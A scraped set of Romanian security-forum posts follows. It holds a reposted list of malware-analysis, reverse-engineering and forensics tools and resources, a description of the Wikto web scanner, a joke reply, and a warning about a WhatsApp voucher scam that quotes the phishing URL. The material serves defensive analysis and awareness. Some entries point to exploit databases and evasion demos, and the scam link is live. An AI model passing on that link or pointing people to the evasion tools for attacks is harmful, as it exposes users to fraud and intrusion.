documents and shellcode sections. Firebug - Firefox extension for web development. Java Decompiler - Decompile and inspect Java apps. Java IDX Parser - Parses Java IDX cache files. JSDetox - JavaScript malware analysis tool. jsunpack-n - A javascript unpacker that emulates browser functionality. Krakatau - Java decompiler, assembler, and disassembler. Malzilla - Analyze malicious web pages. RABCDAsm - A "Robust ActionScript Bytecode Disassembler." swftools - Tools for working with Adobe Flash files. xxxswf - A Python script for analyzing Flash files. Documents and Shellcode Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section. AnalyzePDF - A tool for analyzing PDFs and attempting to determine whether they are malicious. box-js - A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation. diStorm - Disassembler for analyzing malicious shellcode. JS Beautifier - JavaScript unpacking and deobfuscation. JS Deobfuscator - Deobfuscate simple Javascript that use eval or document.write to conceal its code. libemu - Library and tools for x86 shellcode emulation. malpdfobj - Deconstruct malicious PDFs into a JSON representation. OfficeMalScanner - Scan for malicious traces in MS Office documents. olevba - A script for parsing OLE and OpenXML documents and extracting useful information. Origami PDF - A tool for analyzing malicious PDFs, and more. PDF Tools - pdfid, pdf-parser, and more from Didier Stevens. PDF X-Ray Lite - A PDF analysis tool, the backend-free version of PDF X-RAY. peepdf - Python tool for exploring possibly malicious PDFs. QuickSand - QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables. Spidermonkey - Mozilla's JavaScript engine, for debugging malicious JS. File Carving For extracting files from inside disk and memory images. bulk_extractor - Fast file carving tool. EVTXtract - Carve Windows Event Log files from raw binary data. Foremost - File carving tool designed by the US Air Force. Hachoir - A collection of Python libraries for dealing with binary files. Scalpel - Another data carving tool. Deobfuscation Reverse XOR and other code obfuscation methods. Balbuzard - A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more. de4dot - .NET deobfuscator and unpacker. ex_pe_xor & iheartxor - Two tools from Alexander Hanel for working with single-byte XOR encoded files. FLOSS - The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries. NoMoreXOR - Guess a 256 byte XOR key using frequency analysis. PackerAttacker - A generic hidden code extractor for Windows malware. unpacker - Automated malware unpacker for Windows malware based on WinAppDbg. unxor - Guess XOR keys using known-plaintext attacks. VirtualDeobfuscator - Reverse engineering tool for virtualization wrappers. XORBruteForcer - A Python script for brute forcing single-byte XOR keys. XORSearch & XORStrings - A couple programs from Didier Stevens for finding XORed data. xortool - Guess XOR key length, as well as the key itself. Debugging and Reverse Engineering Disassemblers, debuggers, and other static and dynamic analysis tools. angr - Platform-agnostic binary analysis framework developed at UCSB's Seclab. bamfdetect - Identifies and extracts information from bots and other malware. BAP - Multiplatform and open source (MIT) binary analysis framework developed at CMU's Cylab. BARF - Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi - Binary analysis IDE for reverse engineering based on graph visualization. Binwalk - Firmware analysis tool. Bokken - GUI for Pyew and Radare. (mirror) Capstone - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro - Web based code browser using clang to provide basic code analysis. dnSpy - .NET assembly editor, decompiler and debugger. Evan's Debugger (EDB) - A modular debugger with a Qt GUI. Fibratus - Tool for exploration and tracing of the Windows kernel. FPort - Reports open TCP/IP and UDP ports in a live system and maps them to the owning application. GDB - The GNU debugger. GEF - GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep - A utility to search for strings in PE executables including imports, exports, and debug symbols. IDA Pro - Windows disassembler and debugger, with a free evaluation version. Immunity Debugger - Debugger for malware analysis and more, with a Python API. ltrace - Dynamic analysis for Linux executables. objdump - Part of GNU binutils, for static analysis of Linux binaries. OllyDbg - An assembly-level debugger for Windows executables. PANDA - Platform for Architecture-Neutral Dynamic Analysis PEDA - Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio - Perform static analysis of Windows executables. plasma - Interactive disassembler for x86/ARM/MIPS. PPEE (puppy) - A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail. Process Explorer - Advanced task manager for Windows. Process Monitor - Advanced monitoring tool for Windows programs. PSTools - Windows command-line tools that help manage and investigate live systems. Pyew - Python tool for malware analysis. Radare2 - Reverse engineering framework, with debugger support. RetDec - Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools. ROPMEMU - A framework to analyze, dissect and decompile complex code-reuse attacks. SMRT - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace - Dynamic analysis for Linux executables. Triton - A dynamic binary analysis (DBA) framework. Udis86 - Disassembler library and tool for x86 and x86_64. Vivisect - Python tool for malware analysis. X64dbg - An open-source x64/x32 debugger for windows. Network Analyze network interactions. Bro - Protocol analyzer that operates at incredible scale; both file and network protocols. BroYara - Use Yara rules from Bro. CapTipper - Malicious HTTP traffic explorer. chopshop - Protocol analysis and decoding framework. Fiddler - Intercepting web proxy designed for "web debugging." Hale - Botnet C&C monitor. Haka - An open source security oriented language for describing protocols and applying security policies on (live) captured traffic. INetSim - Network service emulation, useful when building a malware lab. Laika BOSS - Laika BOSS is a file-centric malware analysis and intrusion detection system. Malcom - Malware Communications Analyzer. Maltrail - A malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails and featuring an reporting and analysis interface. mitmproxy - Intercept network traffic on the fly. Moloch - IPv4 traffic capturing, indexing and database system. NetworkMiner - Network forensic analysis tool, with a free version. ngrep - Search through network traffic like grep. PcapViz - Network topology and traffic visualizer. Tcpdump - Collect network traffic. tcpick - Trach and reassemble TCP streams from network traffic. tcpxtract - Extract files from network traffic. Wireshark - The network traffic analysis tool. Memory Forensics Tools for dissecting malware in memory images or running systems. BlackLight - Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis DAMM - Differential Analysis of Malware in Memory, built on Volatility evolve - Web interface for the Volatility Memory Forensics Framework. FindAES - Find AES encryption keys in memory. Muninn - A script to automate portions of analysis using Volatility, and create a readable report. Rekall - Memory analysis framework, forked from Volatility in 2013. TotalRecall - Script based on Volatility for automating various malware analysis tasks. VolDiff - Run Volatility on memory images before and after malware execution, and report changes. Volatility - Advanced memory forensics framework. VolUtility - Web Interface for Volatility Memory Analysis framework. WinDbg - Live memory inspection and kernel debugging for Windows systems. Windows Artifacts AChoir - A live incident response script for gathering Windows artifacts. python-evt - Python library for parsing Windows Event Logs. python-registry - Python library for parsing registry files. RegRipper (GitHub) - Plugin-based registry analysis tool. Storage and Workflow Aleph - OpenSource Malware Analysis Pipeline System. CRITs - Collaborative Research Into Threats, a malware and threat repository. Malwarehouse - Store, tag, and search malware. Polichombr - A malware analysis platform designed to help analysts to reverse malwares collaboratively. Viper - A binary management and analysis framework for analysts and researchers. Miscellaneous al-khaser - A PoC malware with good intentions that aimes to stress anti-malware systems. Binarly - Search engine for bytes in a large corpus of malware. DC3-MWCP - The Defense Cyber Crime Center's Malware Configuration Parser framework. MalSploitBase - A database containing exploits used by malware. Pafish - Paranoid Fish, a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do. REMnux - Linux distribution and docker images for malware reverse engineering and analysis. Santoku Linux - Linux distribution for mobile forensics, malware analysis, and security. Resources Books Essential malware analysis reading material. Malware Analyst's Cookbook and DVD - Tools and Techniques for Fighting Malicious Code. Practical Malware Analysis - The Hands-On Guide to Dissecting Malicious Software. Real Digital Forensics - Computer Security and Incident Response The Art of Memory Forensics - Detecting Malware and Threats in Windows, Linux, and Mac Memory. The IDA Pro Book - The Unofficial Guide to the World's Most Popular Disassembler. The Rootkit Arsenal - The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System Twitter Some relevant Twitter accounts. Adamb @Hexacorn Andrew Case @attrc Binni Shah @binitamshah Claudio @botherder Dustin Webber @mephux Glenn @hiddenillusion jekil @jekil Jurriaan Bremer @skier_t Lenny Zeltser @lennyzeltser Liam Randall @hectaman Mark Schloesser @repmovsb Michael Ligh (MHL) @iMHLv2 Monnappa @monnappa22 Open Malware @OpenMalware Richard Bejtlich @taosecurity Volatility @volatility Other APT Notes - A collection of papers and notes related to Advanced Persistent Threats. File Formats posters - Nice visualization of commonly used file format (including PE & ELF). Honeynet Project - Honeypot tools, papers, and other resources. Kernel Mode - An active community devoted to malware analysis and kernel development. Malicious Software - Malware blog and resources by Lenny Zeltser. Malware Analysis Search - Custom Google search engine from Corey Harrell. Malware Analysis Tutorials - The Malware Analysis Tutorials by Dr. Xiang Fu, a great resource for learning practical malware analysis. Malware Samples and Traffic - This blog focuses on network traffic related to malware infections. Practical Malware Analysis Starter Kit - This package contains most of the software referenced in the Practical Malware Analysis book. RPISEC Malware Analysis - These are the course materials used in the Malware Analysis course at at Rensselaer Polytechnic Institute during Fall 2015. WindowsIR: Malware - Harlan Carvey's page on Malware. Windows Registry specification - Windows registry file format specification. /r/csirt_tools - Subreddit for CSIRT tools and resources, with a malware analysis flair. /r/Malware - The malware subreddit. /r/ReverseEngineering - Reverse engineering subreddit, not limited to just malware. Related Awesome Lists Android Security AppSec CTFs "Hacking" Honeypots Industrial Control System Security Incident-Response Infosec PCAP Tools Pentesting Security Threat Intelligence Sursa: https://github.com/rshipp/awesome-malware-analysis/

Wikto Cost: Free Source Code: GitHub Version: 2.1.0.0 (XMAS edition) Requirements: .Net Framework License: GPL Release Date: 2008-12-14 Recent Changes: Fixed incorrect links spider bug Added time anomaly functionality in back-end scanner. Added easy access (and icons) to findings in back-end scanner. Fixed executable finding occasionally not showing bug. Wikto is Nikto for Windows - but with a couple of fancy extra features including fuzzy logic error code checking, a back-end miner, Google-assisted directory mining and real time HTTP request/response monitoring. Downloads using_wikto.pdf Wikto-2.1.0.0-SRC.zip wikto_v2.1.0.0.zip Sursa: Sensepost Research Labs

II penetreaza baietii @TheTime @Nytro. Ce egoisti! Hai sa-i penetram impreuna. Sharing is caring!

Salut! Tocmai am primit asta pe whatsapp: Redirectioneaza la http://vouchercadou2017.site/emag/. Pe whois apare inregistrat cu mail de privacyguardian. Be safe!